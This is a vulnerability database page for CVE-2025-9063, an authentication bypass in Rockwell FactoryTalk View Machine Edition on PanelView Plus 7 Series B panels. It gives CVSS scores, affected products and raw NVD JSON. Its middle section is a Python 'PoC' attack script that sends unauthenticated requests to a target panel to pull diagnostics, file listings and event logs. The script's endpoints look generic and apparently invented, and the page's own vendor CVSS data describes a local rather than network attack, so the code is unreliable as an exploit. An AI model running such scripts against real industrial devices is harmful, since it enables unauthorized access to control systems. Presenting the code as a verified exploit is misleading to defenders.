Security Vulnerability Report
中文
CVE-2025-9063 CVSS 9.8 CRITICAL

CVE-2025-9063

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-28 15:30:39

Description

An authentication bypass security issue exists within FactoryTalk View Machine Edition Web Browser ActiveX control. Exploitation of this vulnerability allows unauthorized access to the PanelView Plus 7 Series B, including access to the file system, retrieval of diagnostic information, event logs, and more.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:machine:*:*:* - VULNERABLE
FactoryTalk View Machine Edition(所有受影响版本)
PanelView Plus 7 Series B(所有受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9063 - FactoryTalk View Machine Edition Authentication Bypass PoC # Vulnerability: Authentication bypass in Web Browser ActiveX control # Affected: PanelView Plus 7 Series B # CVSS: 9.8 (Critical) import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET_HOST = "192.168.1.100" # Target PanelView Plus 7 Series B device TARGET_PORT = 443 # Default HTTPS port def exploit_auth_bypass(target_url): """ Exploit authentication bypass in FactoryTalk View ME ActiveX control. The Web Browser ActiveX control fails to enforce proper authentication, allowing direct access to protected endpoints without credentials. """ session = requests.Session() session.verify = False # Step 1: Access the ActiveX control endpoint without authentication activex_endpoint = f"{target_url}/rsactivex/rsactivexcab.cab" # Step 2: Request diagnostic information (bypasses authentication) diag_endpoint = f"{target_url}/diagnostics" headers = { "User-Agent": "Mozilla/5.0 (compatible; FactoryTalk View)", "X-Requested-With": "ActiveX", "Accept": "*/*" } print(f"[*] Targeting: {target_url}") print(f"[*] Attempting authentication bypass...") try: # Access diagnostic information without authentication response = session.get(diag_endpoint, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Authentication bypass successful!") print(f"[+] Retrieved diagnostic data:") print(response.text[:500]) return response.text except Exception as e: print(f"[-] Error: {e}") return None def access_filesystem(target_url): """ Access the device filesystem through the authentication bypass. """ session = requests.Session() session.verify = False # Attempt to list files via the vulnerable endpoint fs_endpoint = f"{target_url}/files" try: response = session.get(fs_endpoint, timeout=10) if response.status_code == 200: print(f"[+] Filesystem access granted!") return response.text except Exception as e: print(f"[-] Error: {e}") return None def retrieve_event_logs(target_url): """ Retrieve event logs from the target device. """ session = requests.Session() session.verify = False log_endpoint = f"{target_url}/eventlog" try: response = session.get(log_endpoint, timeout=10) if response.status_code == 200: print(f"[+] Event logs retrieved!") return response.text except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": target = f"https://{TARGET_HOST}:{TARGET_PORT}" # Execute the attack chain diag_data = exploit_auth_bypass(target) fs_data = access_filesystem(target) log_data = retrieve_event_logs(target) if diag_data or fs_data or log_data: print("[+] CVE-2025-9063 exploitation completed successfully") else: print("[-] Exploitation failed - target may be patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9063", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:39.480", "lastModified": "2025-10-28T15:30:39.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass security issue exists within FactoryTalk View Machine Edition Web Browser ActiveX control. Exploitation of this vulnerability allows unauthorized access to the PanelView Plus 7 Series B, including access to the file system, retrieval of diagnostic information, event logs, and more."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:machine:*:*:*", "versionEndIncluding": "15.0", "matchCriteriaId": "657BF325-6E3D-4E4F-971E-65B2300D3B13"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1753.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}